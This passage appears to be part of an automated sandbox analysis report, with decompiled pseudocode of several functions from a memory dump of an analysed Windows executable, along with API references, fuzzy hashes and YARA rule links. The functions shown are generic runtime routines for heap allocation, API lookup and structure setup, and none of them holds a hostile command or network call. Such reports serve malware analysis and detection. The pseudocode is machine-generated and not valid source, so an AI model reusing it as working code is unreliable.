					_push(0x92f0);
					_t73 = E00A4EB38(_t86, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00A3B505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00A4FFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00A4FFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00A4FFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00a313dc
0x00a313dc
0x00a313e1
0x00a313e6
0x00a313e7
0x00a313ea
0x00a313ec
0x00a313ef
0x00a313f6
0x00a31402
0x00a31405
0x00a31410
0x00a31414
0x00a3141f
0x00a31425
0x00a3142b
0x00a31436
0x00a3143b
0x00a31440
0x00a31447
0x00a3144d
0x00a31453
0x00a31455
0x00a3147a
0x00a31457
0x00a31457
0x00a3145c
0x00a31462
0x00a31465
0x00a3146b
0x00a31476
0x00a3146d
0x00a3146f
0x00a3146f
0x00a3146b
0x00a3147c
0x00a31488
0x00a3148f
0x00a31496
0x00a3149f
0x00a314aa
0x00a314b4
0x00a314ba
0x00a314c0
0x00a314c6
0x00a314cc
0x00a314d2
0x00a314d8
0x00a314df
0x00a314e5
0x00a314eb
0x00a314f1
0x00a314f7
0x00a314fd
0x00a3150c
0x00a3151b
0x00a31526
0x00a3152e
0x00a31534
0x00a3153a
0x00a31540
0x00a31546
0x00a3154c
0x00a31552
0x00a3155b
0x00a31561
0x00a31567
0x00a3156f
0x00a31577

APIs

__EH_prolog.LIBCMT ref: 00A313E1

Part of subcall function 00A35E37: __EH_prolog.LIBCMT ref: 00A35E3C

Part of subcall function 00A3CE40: __EH_prolog.LIBCMT ref: 00A3CE45

Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d67751c4e0dacdcdf8fda4f798a5b527107945bf8d64bb00be9621dbeb2449bd
Instruction ID: 544466fb4590262e395c1b8478801efe22de090610b39afe2e10497700b18c37
Opcode Fuzzy Hash: d67751c4e0dacdcdf8fda4f798a5b527107945bf8d64bb00be9621dbeb2449bd
Instruction Fuzzy Hash: 004145B0905B409EE724DF798985AE6FBE5FF18300F50492EE5FE83282CB326654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A4359E Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00A4359E(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t29;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t29 = E00A4EB78(0xa62a92, _t67);
				_push(__ecx);
				_push(__ecx);
				_t60 = __ecx;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(__ecx + 0x20));
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00A4EE53(__ecx, __edx, _t72); // executed
					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
					_t29 = E00A4FFF0(__ecx, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t65 * 0x00004ae4) + 0x00000004); // executed
					_t36 = E00A4EE53(( ~(_t73 > 0) | _t65 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t73); // executed
					_pop(0xa71098);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00A42360);
						_push(E00A421C0);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00A4EC7B(_t44, _t60, _t65, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00A4FFF0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00A53E33(0xa71098); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xa71098 = 0x30c00;
								if(_t39 == 0) {
									E00A36CA7(0xa71098);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x00a435a3
0x00a435a8
0x00a435a9
0x00a435ad
0x00a435af
0x00a435b1
0x00a435b4
0x00a435bb
0x00a435bc
0x00a435c4
0x00a435c7
0x00a435cc
0x00a435cc
0x00a435cf
0x00a435d2
0x00a435dd
0x00a435e4
0x00a435e6
0x00a435fe
0x00a435ff
0x00a43604
0x00a43605
0x00a43608
0x00a4360b
0x00a4360d
0x00a4360f
0x00a43614
0x00a43619
0x00a4361a
0x00a4361a
0x00a4361d
0x00a4361f
0x00a43624
0x00a43625
0x00a43625
0x00a4362a
0x00a43634
0x00a4363b
0x00a43645
0x00a43647
0x00a43649
0x00a4364c
0x00a4364f
0x00a43658
0x00a4365f
0x00a43669
0x00a4366e
0x00a43674
0x00a43677
0x00a4367e
0x00a4367e
0x00a43683
0x00a43683
0x00a43686
0x00a4368b
0x00a4368e
0x00a4368e
0x00a4364c
0x00a43645
0x00a43699
0x00a436a1

APIs

__EH_prolog.LIBCMT ref: 00A435A3

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4bc2017fd57c20f7999b1395964b288c373c0d02da514fcf1348bfa6d83cfaf3
Instruction ID: ecaa08185690a2ec7cc7c88743d264f93a3d9de608a9a82a604e7ce7172f0df8
Opcode Fuzzy Hash: 4bc2017fd57c20f7999b1395964b288c373c0d02da514fcf1348bfa6d83cfaf3
Instruction Fuzzy Hash: AB21E9BAE40212BFDF14DF78CD4266BB6A8FB54314F15453AA50696681D3B49A00C7E8

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B093 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00A4B093(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t39;
				char _t41;
				char _t60;
				char _t65;
				signed int _t70;
				void* _t72;
				intOrPtr _t74;
				void* _t77;

				_t77 = __eflags;
				E00A4EB78(0xa62ae8, _t72);
				_push(__ecx);
				E00A4EC50(0x7d2c);
				_push(_t70);
				_push(_t68);
				 *((intOrPtr*)(_t72 - 0x10)) = _t74;
				 *((intOrPtr*)(_t72 - 4)) = 0;
				E00A313DC(_t72 - 0x7d3c, _t68, _t77, 0); // executed
				 *((char*)(_t72 - 4)) = 1;
				E00A31FDC(_t72 - 0x7d3c, __edx, _t70, _t72, _t77,  *((intOrPtr*)(_t72 + 0xc)));
				if( *((intOrPtr*)(_t72 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t72 - 0x24)) = 0;
					 *(_t72 - 0x20) = 0;
					 *((intOrPtr*)(_t72 - 0x1c)) = 0;
					 *((intOrPtr*)(_t72 - 0x18)) = 0;
					 *((char*)(_t72 - 0x14)) = 0;
					 *((char*)(_t72 - 4)) = 2;
					_push(_t72 - 0x24);
					_t59 = _t72 - 0x7d3c;
					_t39 = E00A319AF(_t72 - 0x7d3c, __edx);
					__eflags = _t39;
					if(_t39 != 0) {
						_t70 =  *(_t72 - 0x20);
						_t68 = _t70 + _t70;
						_push(_t70 + _t70 + 2);
						_t65 = E00A53E33(_t59);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x10)))) = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							__eflags = 0;
							 *((short*)(_t65 + _t70 * 2)) = 0;
							E00A50320(_t65,  *((intOrPtr*)(_t72 - 0x24)), _t68);
						} else {
							_t70 = 0;
						}
						 *( *(_t72 + 0x14)) = _t70;
					}
					_t60 =  *((intOrPtr*)(_t72 - 0x24));
					 *((char*)(_t72 - 4)) = 3;
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags =  *((char*)(_t72 - 0x14));
						if( *((char*)(_t72 - 0x14)) != 0) {
							__eflags =  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c));
							E00A3F445(_t60,  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c)));
							_t60 =  *((intOrPtr*)(_t72 - 0x24));
						}
						L00A53E2E(_t60);
					}
					E00A31692(0, _t72 - 0x7d3c, _t68, _t70); // executed
					_t41 = 1;
				} else {
					E00A31692(0, _t72 - 0x7d3c, _t68, _t70);
					_t41 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return _t41;
			}

0x00a4b093
0x00a4b098
0x00a4b09d
0x00a4b0a3
0x00a4b0a9
0x00a4b0aa
0x00a4b0ad
0x00a4b0b7
0x00a4b0ba
0x00a4b0c8
0x00a4b0cc
0x00a4b0d7
0x00a4b0eb
0x00a4b0ee
0x00a4b0f1
0x00a4b0f4
0x00a4b0f7
0x00a4b0fd
0x00a4b101
0x00a4b102
0x00a4b108
0x00a4b10d
0x00a4b10f
0x00a4b111
0x00a4b114
0x00a4b11a
0x00a4b121
0x00a4b126
0x00a4b128
0x00a4b12a
0x00a4b130
0x00a4b133
0x00a4b13b
0x00a4b12c
0x00a4b12c
0x00a4b12c
0x00a4b146
0x00a4b146
0x00a4b148
0x00a4b14b
0x00a4b14f
0x00a4b151
0x00a4b153
0x00a4b157
0x00a4b15c
0x00a4b160
0x00a4b165
0x00a4b165
0x00a4b169
0x00a4b16e
0x00a4b175
0x00a4b17a
0x00a4b0d9
0x00a4b0df
0x00a4b0e4
0x00a4b0e4
0x00a4b181
0x00a4b18a

APIs

__EH_prolog.LIBCMT ref: 00A4B098

Part of subcall function 00A313DC: __EH_prolog.LIBCMT ref: 00A313E1

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 501cab581949931ed4e19c361104294d08638a68bf941bfe220924ddda1007c5
Instruction ID: 6fac15888035a42128fe42a00d65a8d74a748b0315f428e61e803cffcddd7b68
Opcode Fuzzy Hash: 501cab581949931ed4e19c361104294d08638a68bf941bfe220924ddda1007c5
Instruction Fuzzy Hash: FC317C75C102499FCF15DFA8CA51AEEBBB4AF49300F10449EE809B7242D735AE04CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AC98 Relevance: 1.6, APIs: 1, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00A5AC98(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xa92628 + _a4 * 4;
				_t27 =  *0xa6e7ac; // 0xa7a040ce
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xa6e7ac; // 0xa7a040ce
							goto L13;
						}
						 *_t20 = E00A57CA3(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00A5AD34( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xa6e7ac; // 0xa7a040ce
						goto L7;
					}
					_t27 =  *0xa6e7ac; // 0xa7a040ce
					goto L8;
				}
				L2:
				return _t33;
			}

0x00a5aca3
0x00a5acac
0x00a5acb2
0x00a5acbc
0x00a5acbe
0x00a5acc2
0x00a5ad2d
0x00000000
0x00a5ad2d
0x00a5acc6
0x00a5accc
0x00a5acd2
0x00a5acee
0x00a5acee
0x00a5acf0
0x00a5acf2
0x00a5ad1d
0x00a5ad1f
0x00a5ad27
0x00a5ad2b
0x00000000
0x00a5ad2b
0x00a5acfe
0x00a5ad02
0x00a5ad17
0x00000000
0x00a5ad17
0x00a5ad0b
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5acd4
0x00a5acd4
0x00a5acd6
0x00a5acde
0x00000000
0x00000000
0x00a5ace0
0x00a5ace6
0x00000000
0x00000000
0x00a5ace8
0x00000000
0x00a5ace8
0x00a5ad0f
0x00000000
0x00a5ad0f
0x00a5acc8
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00A5ACF8

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 13d69c9388f2968c8b84b4448e59ac68ce3222ef59e2b5e5dc2b7764ac293d95
Instruction ID: 7724333e6594b2339f6a70cdb341e1b73cd7e730f1f4116f985f3e028be3eb1d
Opcode Fuzzy Hash: 13d69c9388f2968c8b84b4448e59ac68ce3222ef59e2b5e5dc2b7764ac293d95
Instruction Fuzzy Hash: C611E337B006256F9B22EFACEC50A5A73B5FB943227164320FD15AB254D630DC0687D2

Uniqueness

Uniqueness Score: -1.00%

Function 00A39215 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00A39215(void* __ebx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				void* _t48;

				E00A4EB78(0xa62895, _t41);
				E00A313BA(_t41 - 0x20, E00A37C64());
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t39 = E00A3D114( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 - 0x20)),  *((intOrPtr*)(_t41 - 0x1c)), _t38);
				if(_t39 > 0) {
					_t27 =  *((intOrPtr*)(_t41 + 0x10));
					_t36 =  *((intOrPtr*)(_t41 + 0xc));
					do {
						_t48 = 0 - _t27;
						if(_t48 > 0 || _t48 >= 0 && _t39 >= _t36) {
							_t39 = _t36;
						}
						if(_t39 > 0) {
							E00A3D300( *((intOrPtr*)(_t41 + 8)), _t41,  *((intOrPtr*)(_t41 - 0x20)), _t39);
							asm("cdq");
							_t36 = _t36 - _t39;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t41 - 0x1c)));
						_push( *((intOrPtr*)(_t41 - 0x20)));
						_t39 = E00A3D114( *((intOrPtr*)(_t41 + 8)));
					} while (_t39 > 0);
				}
				_t21 = E00A315FB(_t41 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t21;
			}

0x00a3921a
0x00a3922c
0x00a3923a
0x00a39243
0x00a39247
0x00a3924a
0x00a3924e
0x00a39251
0x00a39253
0x00a39255
0x00a3925d
0x00a3925d
0x00a39261
0x00a3926a
0x00a39271
0x00a39272
0x00a39274
0x00a39274
0x00a39276
0x00a3927c
0x00a39284
0x00a39286
0x00a3928b
0x00a3928f
0x00a39298
0x00a392a0

APIs

__EH_prolog.LIBCMT ref: 00A3921A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fe189232c7271466888a69a1badb0020c5d5d3ae05bf90d31b501a389a7bf1b8
Instruction ID: 49d1a2864cfe904eda6dbe1e859a81cfae9ec71f75c47dc066cbaea9c9cb5e26
Opcode Fuzzy Hash: fe189232c7271466888a69a1badb0020c5d5d3ae05bf90d31b501a389a7bf1b8
Instruction Fuzzy Hash: 52016573900928ABCF11ABA8CD819DFB775BF88750F014515F816BB152DA748D05C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B136 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00A5B136(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xa926e4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00A58C34();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00A591A8())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00A57A5E(_t15, _t16, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00a5b136
0x00a5b13c
0x00a5b141
0x00a5b14f
0x00a5b14f
0x00a5b155
0x00a5b157
0x00a5b157
0x00a5b16e
0x00a5b177
0x00a5b17f
0x00000000
0x00000000
0x00a5b15f
0x00a5b161
0x00a5b183
0x00a5b188
0x00a5b18e
0x00000000
0x00a5b18e
0x00a5b164
0x00a5b169
0x00a5b16a
0x00a5b16c
0x00000000
0x00000000
0x00a5b16c
0x00000000
0x00a5b16e
0x00a5b147
0x00a5b148
0x00a5b14d
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A59813,00000001,00000364,?,00A540EF,?,?,00A71098), ref: 00A5B177

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f3d4779359e1c53e40df98fc082321062a6c7991b349f08aca7efd6470f11f28
Instruction ID: be3c3c3784e119fec42118182e1177d49cd92383c0476dd89a38fe3ddc605f47
Opcode Fuzzy Hash: f3d4779359e1c53e40df98fc082321062a6c7991b349f08aca7efd6470f11f28
Instruction Fuzzy Hash: A8F0B432625924B7DBA15B72AD25B9F7758BB51763B188311FC08AA190CF30D90986F0

Uniqueness

Uniqueness Score: -1.00%

Function 00A53C0D Relevance: 1.5, APIs: 1, Instructions: 34
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00A53C0D(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0xa920ec + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E00A53B72(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}

0x00a53c15
0x00a53c1c
0x00a53c1f
0x00a53c24
0x00a53c51
0x00000000
0x00a53c51
0x00a53c28
0x00a53c30
0x00a53c39
0x00a53c4f
0x00a53c4f
0x00000000
0x00a53c4f
0x00a53c3f
0x00a53c47
0x00000000
0x00000000
0x00a53c4b
0x00000000
0x00a53c4b
0x00a53c56

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00A53C3F

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: f2cdeea1508385f837b8899fa58419d76b1cc9a9bee106aa345d581a30d7117b
Instruction ID: cf6ebb1b385a6fa8c72dc432c6a31e703a04fd91a4a8089995e2a3907b34ab91
Opcode Fuzzy Hash: f2cdeea1508385f837b8899fa58419d76b1cc9a9bee106aa345d581a30d7117b
Instruction Fuzzy Hash: 60F0A733205216AF8F118FA8FC0099A77A9FF91BA37104125FE05E7190DB31DA28C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A58E06 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00A58E06(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00A591A8())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xa926e4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00A58C34();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00A57A5E(_t7, _t8, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00a58e06
0x00a58e0c
0x00a58e12
0x00a58e44
0x00a58e49
0x00a58e4f
0x00000000
0x00a58e4f
0x00a58e16
0x00a58e18
0x00a58e18
0x00a58e2f
0x00a58e38
0x00a58e40
0x00000000
0x00000000
0x00a58e20
0x00a58e22
0x00000000
0x00000000
0x00a58e25
0x00a58e2a
0x00a58e2b
